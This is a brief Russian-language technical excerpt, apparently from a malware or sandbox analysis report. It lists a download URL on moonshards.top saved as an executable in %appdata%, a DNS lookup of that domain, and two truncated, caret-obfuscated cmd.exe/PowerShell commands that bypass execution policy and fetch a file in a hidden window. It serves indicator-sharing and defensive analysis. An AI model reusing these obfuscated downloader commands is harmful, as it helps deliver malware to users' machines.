Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWEr^s^H^ELl^.^E^Xe -ExeC^Uti^o^N^POl^i^Cy^ b^YPasS -^N^op^Rof^ILE ^-Win^DoW^S^tY^LE HIDD^e^n (^New^-O^b^jEc^T Sy^Stem^.nE^t.^w^e^bcl^IE^nT).d^O^wNlOaDfILe('http://moonshards...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /C "P^oWEr^s^H^ELl^.^E^Xe -ExeC^Uti^o^N^POl^i^Cy^ b^YPasS -^N^op^Rof^ILE ^-Win^DoW^S^tY^LE HIDD^e^n (^New^-O^b^jEc^T Sy^Stem^.nE^t.^w^e^bcl^IE^nT).d^O^wNlOaDfILe('http://moonshards...' (со скрытым окном)